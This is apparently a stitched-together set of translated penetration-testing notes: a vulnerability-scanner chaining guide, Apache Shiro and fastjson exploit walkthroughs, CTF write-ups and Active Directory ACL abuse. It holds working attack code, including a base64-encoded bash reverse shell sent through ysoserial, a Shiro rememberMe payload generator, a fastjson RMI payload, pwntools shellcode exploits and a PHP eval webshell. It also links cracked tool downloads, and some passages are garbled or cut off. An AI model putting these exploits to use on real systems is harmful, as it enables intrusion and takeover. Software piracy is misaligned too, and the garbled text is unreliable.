attack payloads to discover known web vulnerabilities such as cross-site scripting (XSS), SQL injection, cross-site request forgery (CSRF), etc. In passive scanning mode, Appscan will listen to the application's communication and interaction process, analyze data flow and response, and look for potential security vulnerabilities and problems. 2) Support Web application and mobile application scanning Appscan is suitable for both Web application scanning and mobile application security assessment. For web applications, Appscan can automatically discover and evaluate common web vulnerabilities, such as XSS, SQL injection, sensitive information leakage, etc. For mobile applications, Appscan is able to analyze the binary code of the application and discover vulnerabilities and security issues in the application. 3) Penetration testing support Appscan provides penetration testing support, which means it is not just a vulnerability scanning tool, but also can simulate real attacks for testing. Penetration testing can help discover some vulnerabilities that are difficult to detect and have more in-depth testing capabilities for complex vulnerabilities and business logic problems. Appscan tool installation tutorial address: https://blog.csdn.net/qq_39720249/article/details/121248901 Appscan tool cracked version download address (Baidu Netdisk): https://pan.baidu.com/s/1UnAZBFwYvEvzUQPC1eQaBA Extraction code: ime6 3. Yakit Tools yakit introduction: YAK is the first vertical development language in the world dedicated to the integration of underlying capabilities of network security, providing very powerful security capabilities. Yak is a superset of most "data description languages/container languages". It has all Go capabilities and library ecosystems, VSCode plug-ins, etc. The syntax is customizable. It is a Turing-complete scripting language, completely domestic. Provide various underlying security capabilities through functions, including port scanning, fingerprint recognition, poc framework, shell management, MITM hijacking, powerful plug-in systems, etc. Yakit is a cybersecurity individual tool developed based on the yak language, aiming to create a network security tool library covering the entire process of penetration testing. Due to the Yak usage format, users must learn the Yak language and have a certain understanding of security at the same time. In order to make Yak's own security capabilities easier to be accepted and used by everyone, we wrote a gRPC server for Yak and built a client: Yakit, which lowers the threshold for everyone to use Yak through the interface GUI. A brief introduction to yakit functions (too many functions): Yakit is a highly integrated output platform for Yak language security capabilities. Using Yakit, we can do: 1) MITM hijacking operation table similar to Burpsuite 2) View the history of all hijacked requests and analyze the parameters of the requests 3) The world's first visual web fuzzer tool: Web Fuzzer 4) Yak Cloud IDE: Yak Language Cloud IDE with built-in smart prompts 5) ShellReceiver: Turn on the TCP server to receive rebound interactive shell anti-connection 6) Third-party Yak module store: a community-led third-party Yak module plug-in, you have everything you want 7. Yakit tool installation tutorial address: https://blog.csdn.net/m0_60045654/article/details/134645164 Yakit tool download address: https://yaklang.com/ 4. Burp Suite Introduction to burp suite: burp suite is an integration platform for attacking web applications. Burp Suite is an integration platform for attacking web applications and contains many tools. Burp Suite designs many interfaces for these tools to speed up the process of attacking applications. All tools share a request and can handle corresponding HTTP messages, persistence, authentication, proxy, logs, and alerts. Introduction to the functions of the burp suite tool: 1) Target (target) —— displays a function of the target directory structure 2) Proxy (Proxy) —— intercepts HTTP/S proxy server, acting as an intermediary between the browser and the target application, allowing you to intercept, view, and modify the original data flow in both directions. 3) Spider (spider) —— uses intelligent sensing web crawler, which can fully enumerate the content and functions of the application. 4) Scanner (scanner) —— advanced tool, after execution, it can automatically discover security vulnerabilities in web applications. 5) Intruder (Intruder) —— A customized highly configurable tool that automates web applications such as enumerating identifiers, collecting useful data, and using fuzzing technology to detect conventional vulnerabilities. 6) Repeater (repeater) —— A tool that relies on manual operations to trigger separate HTTP requests and analyze application responses. 7) Sequencer (session) —— is a tool used to analyze the randomness of unpredictable application session tokens and important data items. 8) Decoder (decoder) —— is a tool for manual execution or intelligently decoding and encoding application data users. 9) Comparer (comparison) —— usually obtains a visual 'difference' of the two data through some related requests and responses. 10) Extender (Extension) —— allows you to load Burp Suite extensions and use your own or third-party code to extend the functions of Burp Suite. 11) Options (Settings) —— Some settings for Burp Suite Burp suite tool installation tutorial address: https://blog.csdn.net/m0_60045654/article/details/134645164 Burp suite tool jar crack package: **https://link.zhihu.com/?target=https%3A//github.com/lzskyline/BurpLoaderKeygen/raw/main/BurpLoaderKeygen.jar Burp suite tool download address: https://link.zhihu.com/?target=https%3A//portswigger.net/burp/releases/ 5. Xray Introduction to xray tool: Xray is a powerful security assessment tool launched by Changting Technology. It is created by many experienced front-line security practitioners. It supports active and passive scanning methods, supports multiple operating systems such as Windows, Linux, and macOS, and supports user-defined POCs. It can quickly detect vulnerabilities in target websites. Compared with traditional manual vulnerability scanning, xray has the following advantages: 1. High degree of automation, reducing the time and energy of manual operation; 2. Supports scanning of multiple vulnerability types; 3. Support distributed deployment; 4. Support web interface management. xray function introduction: The POC framework has built-in pocs contributed on Github by default, and users can also build and run them by themselves as needed. Currently supported vulnerability detection types include : 1) XSS vulnerability detection (key: xss) 2) SQL injection detection (key: sqldet) 3) Command/code injection detection (key: cmd-injection) 4) Directory enumeration (key: dirscan) 5) Path crossing detection (key: path-traversal) 6) XML Entity Injection Detection (key: xxe) 7) File upload detection (key: upload) 8) Weak password detection (key: brute-force) 9) jsonp detection (key: jsonp) 10) Ssrf detection (key: Ssrf) 11) Baseline examination (key: baseline) 12)Arbitrary jump detection (key: redirect) 13) CRLF injection (key: crlf-injection) 14) Struts2 Series Vulnerability Detection (Advanced Edition, key: struts) 15) Thinkphp series vulnerability detection (advanced version, key: thinkphp) 16) XStream Series Vulnerability Detection (key: xstream) 17) POC framework (key: pantasm) Xray tool installation tutorial address: https://blog.csdn.net/weixin_52244272/article/details/132278409 Xray11 tool cracked version download address: https://pan.baidu.com/s/1n5lqeSVXpk_CgBS7JMFkdA?pwd=amlj Extraction code:amlj 0x02 Tool linkage Start linking five tools to automatically scan for vulnerabilities in the target website. 1. Set up appscan tool linkage preparation Open the appscan tool interface and select--New-Scan web service--Next. Select -- Let AppScan automatically select ports (the ports and addresses selected here are the addresses and ports that Awvs agent listens on) -- Local -- I need to configure other connection settings -- Next step Select --Use custom proxy settings --Address: 127.0.0.1 --Port: 8083 (The proxy address and port set here are Yakit's proxy listening address) --Next. No need to set it, just go next. Without setting, just go to the next step and click Finish. Get an external traffic recorder, and wait for the traffic to pass through here to display. 2. Set up Yakit tool linkage preparation Start the Yakit tool Open a temporary project Select the penetration testing tool--MIMT interactive hijacking Let me mention here that Yakit has only 15 scanning plug-ins downloaded by default. If you want to have a more comprehensive passive scanning vulnerability, you can go to the plug-in store to download the plug-in you need. You can download all the plug-ins with one click, but the scanning will be very slow. Just download some of the things you need. Go back to MIMT interactive hijacking, set the hijacking agent listening host to: 127.0.0.1, the hijacking agent listening port to: 8083, and the downstream agent is: http://127.0.0.1:8080 (the downstream address set here is the proxy listening address and port of Burp Suite). Select Enable plug-in, set the plug-in on the left to Select All, and select configuration-free startup after setting (it is best to choose configuration-free startup, otherwise the traffic cannot pass when linking the Burp suite tool). The vulnerabilities scanned later will be displayed here 3. Set up the linkage preparation for Buro Suite tool Open the Burp Suite tool and select --Temporary Project --Next. Use the default value of Burp Suite --Next. Select Settings Set up the proxy, the binding proxy port is: 8080, and the binding address is: loopback only (the proxy listening address and port set here are the downstream proxy addresses set by Yakit). Set up the upstream proxy of burp suite, the target host is: * (all target hosts are allowed), the proxy host is: 127.0.0.1, and the proxy port is: 7777. (The Xray listening address and port are set here) Added real-time tasks Set passively scan all traffic passing through the proxy Edit built-in scanning behavior. Set the scan type, select all, turn on firepower, click Save. Click OK and set the passive scan. 4. Set up Xray tool linkage preparation Use Xray to listen for port 127.0.0.1:7777 (the port you listen to here is the upstream proxy set by Burp Suite), passively scan for vulnerabilities, and output vulnerabilities to 123.html. 0x04 Start testing linkage scanning All preparations are in place, use the Awvs tool as the starting point for the first access scan target traffic. 1. Intercept traffic First hijack the traffic of Yakit and Burp Suite to facilitate the viewing of traffic trends later. 2. Set awvs scanning target Set the awvs scan target to access traffic. Add a scan target (this target is authorized), and click Save.

Shiro Apache Shiro provides authentication, authorization, encryption and session management functions to hide complex problems and provide clear and intuitive APIs that enable developers to easily develop their own program security code. Shiro focuses on what Shiro develops its development team calls the "four security cornerstones" - authentication, authorization, session management and encryption Authentication: User identity identification. Sometimes it can be regarded as a "login", which is an act of the user to prove who he is. Authorization: Access control process, like determining "what" can access "what". Session Management: manages user sessions, even in an environment without WEB or EJB containers. Manage user time-related status. Cryptography: Use encryption algorithms to protect data more securely and prevent data from being peeped at. @shiro:https://github.com/vulhub/vulhub/tree/master/shiro CVE-2010-3863: Apache Shiro certification bypass vulnerability Vulnerability Principle In versions before Apache Shiro 1.1.0, shiro did not standardize the URL before performing permission verification. Attackers can construct /, //, /./, /…/, etc. to bypass permission verification. Affect Version shiro 1.1.0 and JSecurity 0.9.x Vulnerability Recurrence The access page address is: IP:8080 Vulnerability Points/admin Testing dictionary fuzz using cross directory CVE-2016-4437: Apache Shiro 1.2.4 Deserialization Vulnerability/shiro550 Vulnerability Principle It belongs to the shiro550 vulnerability. In Apache Shiro 1.2.4 and previous versions, encrypted user information was serialized and stored in a cookie named remember-me. Attackers can use Shiro's default key to forge user cookies, trigger Java deserialization vulnerability, and then execute arbitrary commands on the target machine. Shiro uses CookieRememberMeManager by default, encrypts the rememberMe cookies, and serializes the rememberMe field contents in the cookieRememberMeManaer class, AES encryption, and Base64 encoding operations. When identifying an identity, you need to decrypt the rememberMe field in the cookie. According to the encryption order, it can be inferred that the order of decryption is to obtain==cookie-base64 decoding-AES decryption-deserialization.== Affect Version Apache Shiro=1.2.4 Vulnerability Recurrence Determine whether a page's login is used by the shiro framework for authentication, authorization, password and session management. How to judge: After checking the Remember Password option, click Login, grab the packet, and observe whether there is a rememberme field in the request package, and whether there is a Set-cookie:rememberMe=deleteMe field in the response package. Similar to the picture below. As long as the rememberMe=deleteMe field appears in the response package, it means there is a vulnerability. To put it in one-sidedly, if the rememberMe=deleteMe field appears, it should only indicate that the login page uses shiro for authentication, not directly indicating that there is a vulnerability and the recallMe field in the cookie of the request package, and the return package set-cookie does not have the deleteMe field. If the login fails, regardless of whether the RememberMe field is checked or not, the return package will have the rememberMe=deleteMe field. If the login is successful, the return package will have the rememberMe=deleteMe field. If the login is successful, the return package set-cookie has the rememberMe=deleteMe field. However, in all subsequent requests, the cookies will not have a RememberMe field check RememberMe. If the login is successful, the return package will have a RememberMe=deleteMe field in the set-Cookie, and there will be a RememberMe field. In all subsequent requests, the cookies will have a RememberMe field or you can add a RememberMe=1 after the cookie to see if there is any rememberMe=deleteMeYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjEyOS80NDQ0IDA+JjE= java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjEyOS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}' Use shiro-exploit.py to get the default key of shiro (Tool address: https://github.com/insightglacier/Shiro_exploit) Use shiro.py to generate payload (you need to change the key yourself, the shiro.py code is as follows:) Command: shiro.py 192.168.17.132:6666 shiro.py: import sys import uuid import base64 import subprocess from Crypto.Cipher import AES def encode_rememberme(command): popen=subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE) BS=AES.block_size pad=lambda s: s + ((BS - len(s) %BS) * chr(BS - len(s) %BS)).encode() key=base64.b64decode('kPH+bIxk5D2deZiIxcaaaA==') iv=uuid.uuid4().bytes encryptor=AES.new(key, AES.MODE_CBC, iv) file_body=pad(popen.stdout.read()) base64_ciphertext=base64.b64encode(iv + encryptor.encrypt(file_body)) return base64_ciphertext if __name__=='__main__': payload=encode_rememberme(sys.argv[1]) print ('rememberMe={0}'.format(payload.decode())) python3 shiro.py 192.168.200.129:6666 After logging in, grab the packet and replace the cookie value in the data packet to rememberMe generated by shiro.py CVE-2020-1957: Apache Shiro certification bypass vulnerability Vulnerability Principle We need to analyze the incoming delivery process of the URL we requested throughout the project. In the project that uses shiro, it is the URL we requested (URL1), which has been inspected by shiro permissions (URL2), and finally find the route to the springboot project to process (URL3) The vulnerability occurs in URL1, URL2 and URL3. It may not be the same URL, which leads us to bypass shiro's verification and directly access the backend. The vulnerability in this case is caused by this reason. Shiro framework controls user access rights through interceptor functions, such as anon, authc and other interceptors. anon is an anonymous interceptor and does not require login to access; authc is a login interceptor and needs to login to access. Affect Version Apache Shiro 1.5.2 Vulnerability Recurrence Change the URL to /admin will automatically jump to the login login page Construct malicious requests for permission bypass Because the code level is added; it will be recognized as bypassed. Add one/short. The URL is changed to /xxx/./admin/bypassed the login and the direct access is successful! /xxx/./admin/ Shiro 721 Vulnerability recurrence: CVE-2019-12422 Environment: kali linux Docker build and start git clone https://github.com/3ndz/Shiro-721.git cd Shiro-721/Docker docker build -t shiro-721. docker run -p 8080:8080 -d shiro-721 access: If you log in with the correct account password, you will send two request packets, namely POST and GETPOST request packets, as shown in the figure below (the package obtained by logging in with the correct account password) The GET request package is as follows (this is the package obtained by logging in with the correct password, mainly submitting cookie values to the background) Seeing a rememberMe=deleteMe field in the response package, it can be said that there is a shiro deserialization vulnerability Burp plugin adds HaE and Logger++ to view shiro's fingerprint Tool Utilization: fastjson @fastjson:https://github.com/vulhub/vulhub/tree/master/fastjson Vulnerability Principle The principle of this vulnerability lies in Fastjson's deserialization mechanism. When Fastjson parses JSON data, it tries to convert the JSON data to a Java object. In this process, Fastjson will determine how to parse the data based on the type information in the JSON data. Attackers can take advantage of this feature to construct specific data types and structures in JSON, so that Fastjson calls maliciously constructed Java classes or methods during parsing, thereby realizing remote code execution. A common way of exploiting is to use Fastjson's autoType function. autoType is a feature of Fastjson that allows the use of fully qualified class name of the class when serializing and deserializing. An attacker can construct a malicious JSON data and use the malicious class as the value of autoType. When Fastjson deserializes, it will try to instantiate the specified class, thereby executing the code in the class (in the exploit process, JdbcRowSetlmpl is generally exploited to exploit the chain). @type field @type is one of the special fields in Fastjson that are used to process object type information. In JSON data, the @type field can be used to specify the type of the class that should be instantiated during deserialization. This field is usually used to specify the type information of the object during deserialization, especially when Fastjson's autoType function is enabled. Through the @type field, Fastjson can identify the class to be instantiated and create objects based on the classpath provided in that field. This is very useful when serializing and deserializing complex object structures, as it allows you to specify the exact type of the object. However, it is precisely because of the existence and use of the @type field that malicious users may use this field to construct malicious JSON data and specify the malicious classpath in the @type field. In this way, during the deserialization process, Fastjson will try to instantiate the corresponding class based on the classpath specified by the @type field, resulting in the possibility of malicious code being executed or security vulnerabilities being exploited. JNDI JNDI, RMI, and LDAP are technologies used in Java for different purposes. JNDI (Java Naming and Directory Interface): JNDI is a set of APIs in Java that are used to access different naming and directory services. JNDI provides a unified access method that allows Java applications to connect and use a variety of different naming and directory services, such as DNS, LDAP, RMI registry, etc. The purpose of JNDI is to provide a unified access method, allowing Java applications to take advantage of the naming and directory functions of different services. RMI (Remote Method Invocation): RMI is a mechanism used in Java to implement remote method calls. It allows communication and method calls between objects between different Java virtual machines. In distributed systems, RMI allows remote systems to call each other's methods to achieve interaction between remote objects. LDAP (Lightweight Directory Access Protocol): LDAP is a protocol used to access distributed directory services. It is usually used to store structured data, such as user information, organizational structure, etc. In Java, JNDI provides support for LDAP access, allowing JNDI to connect and operate LDAP directory services, such as user authentication, retrieval of data, etc. The relationship between these technologies is that JNDI, as a Java API, provides a unified way to access different services, including LDAP. JNDI enables you to connect and operate an LDAP server, and retrieve and store data in an LDAP directory. In addition, JNDI can also be used to find remote objects in the RMI registry to implement remote method calls. In summary, JNDI, as an API in Java, provides a unified way to access different services, allowing Java applications to connect and operate different naming and directory services such as LDAP and RMI registry. JdbcRowSetImpl utilizes chain In fastjson, we use JdbcRowSetImpl for deserialization attacks. The focus of JdbcRowSetImpl's utilization chain is how to call the autoCommit set method. The characteristic of fastjson deserialization is that it will automatically call the set method of the class, so there is a problem of deserialization. As long as the @type type is formulated, it will automatically call the corresponding class to parse. This way we can construct our utilization chain. When the type of @type is JdbcRowSetImpl, the JdbcRowSetImpl class will be instantiated. So as long as the dataSourceName is passed to the lookup method, it can ensure that the remote attack server can be accessed, and then use the autoCommit property to trigger the lookup. The whole process is as follows: The method of passing the attribute to the lookup by setting the dataSourceName - setting the autoCommit property, using the SetAutoCommit function to trigger the connect function - trigger the connect function The lookup function below will use the dataSourceName parameter just set, and you can access the remote server through RMI, thereby executing malicious instructions. Exploit is as follows: {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://192.168.17.39:9999/Exploit","autoCommit":true} It is worth noting that: 1. The dataSourceName needs to be placed in front of autoCommit, because when deserialization is set, the attribute is set in order, and etDataSourceName first, and then setAutoCommit. 2. The url of rmi follows the name of our remote factory class to be retrieved, because the name under the path will be extracted in lookup() as the class to be retrieved. fastjson detection version 1. Use dnslog to take it away. It is best to use your own dnslog because most of the dnslogs are written into the blacklist. 2. There is an error message, and the version number payload has not been read "{" and "," before entering the defective code block and throwing an exception 3. Use scripts to quickly detect version numbers, that is, each POC is called once, if there is, there is no, if there is no. CVE-2017-18349 fastjson 1.2.24-rce 0x00 Introduction fastjson is Alibaba's open source JSON parsing library. It can parse strings in JSON format, supports serializing Java Beans into JSON strings, or deserializing from JSON strings to JavaBeans. That is, the main function of fastjson is to serialize Java Beans into JSON strings, so that after obtaining the string, it can be persisted through databases, etc. 0x01 Vulnerability Overview In the process of parsing json, fastjson supports the use of autoType to instantiate a specific class and call the set/get method of the class to access the attributes. By finding relevant methods in the code, some malicious exploit chains can be constructed. 0x02 Affect Version Scope of impact: fastjson=1.2.24 0x03 Environment construction cd /vulhub/fastjson/1.2.24-rce docker-compose up -d docker ps Docker opens port 8090, accesses the target machine IP http://192.168.200.166:8090/ JDK version switching Vulnerability exploit requires jdk8, and the jdk that comes with kali is jdk11 cannot be used here, so uninstall kali's jdk1123 first dpkg --list | grep -i jdk #View installed jdk packages apt-get purge openjdk-* #Uninstall openjdk related packages dpkg --list | grep -i jdk #Check that all jdk packages have been uninstalled Download jdk1.8 https://github.com/frekele/oracle-java/releases/download/8u212-b10/jdk-8u212-linux-x64.tar.gz Put the compressed package into kali and decompress and configure environment variables mv jdk-8u212-linux-x64.tar.gz /opt/java #Place in /opt/ja

1. Data security questions 1 .AS View examples and questions and write exp def pell_recurrence(x1, y1, x, y, D): x_next=x1 * x + D * y1 * y y_next=x1 * y + y1 * x return x_next, y_next #calculate def generate_until_threshold(x1, y1, D, threshold): x, y=1, 0 solutions=[(x, y)] iteration=0 while True: x, y=pell_recurrence(x1, y1, x, y, D) iteration +=1 solutions.append((x, y)) if x threshold and y threshold: break return solutions, iteration, (x, y) ################################################################## def main(): D=42232 x1, y1=10863430363390445672094671043496198963286006933268455141841942775234559999, 52862312812076818203801374519259164308207980652808243827880652144787200 threshold=2 **0x149f solutions, iterations, last_solution=generate_until_threshold(x1, y1, D, threshold) print(f' x={last_solution[0]}') print(f' y={last_solution[1]}') n1=(last_solution[0] - 1) //2 n2=last_solution[1] print(n1) print(n2) if __name__=='__main__': main() n1=6484456464385494958985160233577839841735795804647354190796586547182550378527267882223754238651441651725550102689465473718387558249680778387240949510753434184201786605123847893899093406567717389454538 6342407659205001068135302729237100620243248709910469788678708717889604288162784417431423112537621495419154772986757675855167129919386700726005394167383331284254279498630255373138495682828010693186447810 5747928749942182896044998865749248551237702694523130962244318388047216423763541300420337417782220630444089221596447522910893615324877093077575834234632206558845108059414461593855011448692345628660664306 8395998155316596913497744579744077742423463881471672458781349375368356413765775128419424003099676833789760649723034315709289197588503633098101852953596135719124951778966166882244717559306946188988876913 0598854771926155737315230514752046521202893304056240286346925487675988559705443898301236706180919342302429465894637859344643029018424523547396779994375190095466431959714922380071905524429743822991653088 9482740693358858886945778091075479767043403338315077245817584501204836101045898033382579741708159642221431364092087627932238340345061520303793648076973193990895662534842239113818516252719396503715138316 6115929559837059526120429960898263731511653364200306669261874318917797797511599010768665767007935673823935662067654373217132550990224714558326022862910254573865374743852845589800119354399325882955858912 5426525550586695373047067726351358183887658916360966276066716968285230497455072503555764167568060675739545960438904928347842532194851125250305537530924233133264250758350828806805623873239302114836480000 n2=631077577837315807212150605001212011073700092115983086048740595191397762984508443612849134473582040026490305611506672815790733279455324389749038244192826523764101532018565743490392509759876096077887 8832544423181756899326304063782908439562569708467673549276158693692888001929891891744223454661337998539277783475975019927833495777599483895984131746152326733533402089732453584337320359607883603900037507 8019839415884013345498043473444057860171445618628885820669899955565786433581042661497092955707897522740118225382682538460934652896234403638883250225904674132191120017142678063796240523447446112088083480 9003855463232063187607331663553796062046207210640552948434337370007381441733734803953072245096582393802864729330924382527356098137452931852934251401785618978991521206247075519888904264778862933717556843 876611759454744828205597534256578148852799693013920359743897278354653848976322146722301616470055723006827166136303455670710003638464315811357227470395415655224937948450914818485837106928933473384856351 3562506182502826257198176485230753980573080356791813553201718713496268667916027510756787675230893541319068679146341573352252143049354837542440743305672512279930021618838093554441531642048116980907147626 423248156091825179885062681506303604070652846991305601280740083579032479034947212812440317249494983943341118835003599780758893627981692531706689912199808384763177614409977387670316498292979992834435354912 2389259490732638723303504957174689978086401613054702247774451584115199235037185582727394255585715896600435834403902988987940547963269504370891849450258752419616559584122132413440460209140828641358681600 NC connection submission Get username:ADMIN-JM password:JM001x! flag: md5(ADMIN-JM+JM001x!) or: #sage 9.5 from Crypto.Util.number import * from pwn import * import sys sys.set_int_max_str_digits(0) def interact(io, x, y): io.recvuntil(b':') io.sendline(b'2') io.recvuntil(b'n1~') io.sendline(str(x).encode()) io.recvuntil(b'n2~') io.sendline(str(y).encode()) io.recvline() return io.recvline() D=42232 check=2 **0x149f def solve_pell(N): cf=continued_fraction(sqrt(N)) i=0 whileTrue: i +=1 denom=cf.denominator(i) numer=cf.numerator(i) if (((numer - 1) //2)=check) or (denom=check): Continue continue if numer^2 - N * denom^2==1: x, y=int((numer - 1) //2), int(denom) res=interact(io, x, y) ifb'Sorry'in res: Continue continue Return res io=remote('47.117.41.252', '33410') context.log_level='debug' res=solve_pell(D) print(res) io.interactive() #b'Verify success!Your username[ADMIN-JM], your password[JM001x!]~'Final flag: b7133d84297c307a92e70d7727f55cbc 2.SCSC Title description: Use program vulnerabilities to obtain data information in info_sec file and submit data in row 11, column 2 Process of the question: When I got the scsc binary file, I found that it was statically compiled, and there was no library function, and the symbol table was missing, resulting in the library function having no name Here we use the reverse technique, there are three ways to restore some symbol tables Use different versions of sig files, try to restore the use of bindiff, use different libc files, compare the machine code of the library function, and use the fingerprint plugin to restore the function name (need to be connected to the Internet). I personally think the most effective effect is the fingerprint plugin. This game is also constantly online, so I use it. It not only recognizes libc, but without it, I don’t know that I also used C++ libraries. Here we show the effect after recovery This program is an AES decryption function set shellcode executor and disables some visible characters. We need to encrypt and transmit shellcode without filtering characters. Here is the easiest way to create a read using shellcode, jump, and then enter an ordinary shellcode. The visible character filtering here limits "sh" and various 64-bit register operations. So I used 32 bit registers, easily bypassed, turned on sys_read, inject shellcode, getshell from pwn import * from std_pwn import * from Crypto.Cipher import AES from Crypto.Util.Padding import pad defgetProcess(ip,port,name): Global P iflen(sys.argv) 1and sys.argv[1]=='r': p=remote(ip, port) Return p else: p=process(name) Return p sl=lambda x: p.sendline(x) sd=lambda x: p.send(x) sa=lambda x, y: p.sendafter(x, y) sla=lambda x, y: p.sendlineafter(x, y) rc=lambda x: p.recv(x) rl=lambda: p.recvline() ru=lambda x: p.recvuntil(x) ita=lambda: p.interactive() slc=lambda: asm(shellcraft.sh()) uu64=lambda x: u64(x.ljust(8, b'\0')) uu32=lambda x: u32(x.ljust(4, b'\0')) # return sl, sd, sa, sla, rc, rl, ru, ita, slc, uu64, uu32 defaes_ecb_encrypt(plaintext): print(plaintext) for c inb'0MOyhjlcit1ZkbNRnCHaG': if c in plaintext: print(f'{chr(c)} in it !') # Convert hexadecimal string key to bytes key=b'862410c4f93b77b4' # Create an AES encryptor cipher=AES.new(key, AES.MODE_ECB) # Fill in and encrypt the plain text padded_plaintext=pad(plaintext, AES.block_size) ciphertext=cipher.encrypt(padded_plaintext) # Convert ciphertext to hexadecimal string and return return ciphertext shellcode=''' push rsp pop rsi mov edi,0 mov edx,0xff push rdi pop rax syscall jmp rsp ''' # 01ayhcjitkbn MOlZNRCHG p=getProcess('47.117.42.74',32846,'./scsc') context(os='linux', arch='amd64', log_level='debug',terminal=['tmux','splitw','-h']) elf=ELF('./scsc') gdba() payload=asm(shellcode) sa('magic data:',aes_ecb_encrypt(asm(shellcode))) sl(asm(shellcraft.sh())) ita() or #!/usr/bin/env python3 from pwn import * context.log_level='debug' context.arch='amd64' # io=process('./scsc') io=remote('47.117.41.252',33414) shellcode=''' xchg r8, rax xchg r8, rsi sub edi, edi mov edx,0x99 sub eax, eax syscall ''' payload1=asm(shellcode) print('shellcode=', payload1.hex()) payload1=bytes.fromhex('e29aca48e52d1d59c539c172262e56c7aeae3b0ebb4e872fa01f84506ad7c226') payload2=b'\x90'*len(payload1) + asm(shellcraft.sh()) # gdb.attach(io) io.sendlineafter(b'magic data:', payload1) pause() io.send(payload2) io.interactive() 3.ez_upload Title description: There is no attachment to the test question in this question, please ignore the attachment download button! A server stores the RSA key file for encrypted data. The administrator did not repair the vulnerable test site in time when maintaining the server site. Please submit the path where the RSA key is located (submission style: If the path where the file is located is /var/www, the submission answer is /var/www) Problem procedure: Preliminary idea, pass on horse, getshell, and then find files related to RSA html and php are all dropped by waf. The suffix may be used to detect the file content. Content-Type: text/html Waf this The suffix was wafed, html, php,htaccess,'.php','.php5','.php4','.php3','.php2','.html','.htm','.pht','.pht','.pHp','.pHp5','.pHp4','.pHp3','.pHp2','.Html','.Htm','.pHtml,user.ini Echoing as NOT THIS. But the echo of the phtml suffix is NOT THIS CONTEHT php7.2 or above, htaccess file needs to be configured It's not png 2 rendering The middleware is apache, resolve vulnerability? It is found that the file content is checked, and the content containing php will be dropped by waf. Successfully passed on horse ?=@eval($_POST['cmd']); The path to find the RSA key is /var/www/rssss4a 4.Data disclosure and privacy protection Title description: As a technical support staff member of a publicity department, when conducting an activity to publicly commend outstanding volunteers, due to excessive data desensitization, the personal information cannot be accurately identified, resulting in Multiple volunteers are confused about information. Please solve the problem according to the task requirements of 《题目说明文档》 in the attachment. Problem procedure: Entry :open file - table base64 encryption - use time() to generate pseudo-random array - Exoor encryption - write to new file

Abuse of active directory ACLs\ACEs permissions https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse https://www.cnblogs.com/nice0e3/p/15879624.html DACL and ACE are concepts related to access control and are commonly used in operating systems and network environments. Here is a detailed explanation of them: DACL (Discretionary Access Control List): DACL is an access control list used to determine who can access specific objects (such as files, folders, registry keys, etc.). DACL is a list of access control entries (ACE). ACE (Access Control Entry): ACE is the basic unit in DACL, used to grant or deny access to objects. Each ACE defines a security principal (such as a user, group, computer, etc.) and the permissions that the security principal has. In a DACL, each ACE contains the following information: Security principal (SID): A unique identifier that identifies a user, group, or computer whose access is authorized or denied. Access permissions: Indicates specific operations or permissions (such as reading, writing, execution, etc.). Access Mask: Specifies the permissions that are actually granted or denied. Auxiliary access mask: In some cases, used to specify other conditions or restrictions. When accessing an object, the system will verify based on the ACE in the DACL. Access will be allowed if there is an ACE that matches the user identity and the ACE grants the requested permission. If there is no matching ACE, or there is an ACE that matches the user identity, but the ACE denies the requested permission, access will be denied. The ACE of the domain administrator is as follows Among them, the permissions we are concerned about are as follows GenericAll- full rights to the object (add users to a group or reset user's password)GenericWrite- update object's attributes (i.e logon script)WriteOwner- change object owner to attacker controlled user take over the objectWriteDACL- modify object's ACEs and give attacker full control right over the objectAllExtendedRights- ability to add user to a group or reset passwordForceChangePassword- ability to change user's passwordSelf (Self-Membership)- ability to add yourself to a groupGenericAll - Have full permissions to the object (such as adding a user to a group or resetting a user's password). GenericWrite - Updates the properties of the object (such as login scripts). WriteOwner - Modify the owner of the object to be a user controlled by the attacker and take over the object. WriteDACL - Modify the ACEs of the object and grant the attacker all control over the object. AllExtendedRights - Ability to add users to groups or reset passwords. ForceChangePassword - Ability to change the user's password. Self (Self-Membership) - Ability to add yourself to a group. Self-Membership - This permission refers to the permission that an account can add itself to a group (the need to add ACE to the advanced permissions of a certain group, that is, it is for group objects), that is, an object is the Self-Membership identity in a certain group. GenericAll GenericAll permissions to user accounts Use the PowerView tool to view the user's GenericAll permissions. powershell -exec bypass Import-Module .\PowerView.ps1 //Get the access control list (ACL) of the AD object of user man1, filter and return the item with 'GenericAll' permission Get-ObjectAcl -SamAccountName man1 -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq 'GenericAll'} You can see that the spotless user has GenericAll permissions to delegate, so if the spotless user permissions have been obtained, we can take over the delegate user. **Change password: **Change password directly to modify the delegate user. net user usernamepassword /domain **Kerberoasting attack: **Set SPN for the delegate user, and then request all service STs through the spotless user's TGT, obtain the HASH encrypted STs of the delegate user, and crack it. # Set SPN Set-DomainObject -Credential $creds -Identity username -Set @{serviceprincipalname='fake/NOTHING'} # Get Hash .\Rubeus.exe kerberost /user:username /nowrap # Clean SPN Set-DomainObject -Credential $creds -Identity username -Clear serviceprincipalname -Verbose https://github.com/ShutdownRepo/targetedKerberoast python3 targetedKerberost.py -domain.local -u username -p password -v **ASREProast Attack: **You can make a user ASREPRoastable by disabling pre-authentication and then perform an ASREProast attack on it. Set-DomainObject -Identity username -XOR @{UserAccountControl=4194304} GenericAll permissions to user groups //Get the distinguishedName value of the domain admins group Get-NetGroup 'domain admins' //Get the ACL of the Domain Admins group Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq ' CN=Domain Admins,CN=Users,DC=vvvv1,DC=com'} It was found that the spotless user has GenericAll permissions to the Domain Admins group and can attack. Add yourself (user spotless) or other users to the Domain Admin group. net group 'domain admins' spotless /add /domain You can also use Active Directory or PowerSploit modules for attack. # with active directory module Add-ADGroupMember -Identity 'domain admins' -Members spotless # with Powersploit Add-NetGroupUser -UserName spotless -GroupName 'domain admins' -Domain 'offense.local' GenericAll permissions to machine or service accounts If you have GenericAll permissions or GenericWrite permissions on a machine account or service account, you can consider using resource-based constraint delegation attacks. For details, see 《内网横向移动-基于资源的约束委派》; for service accounts, 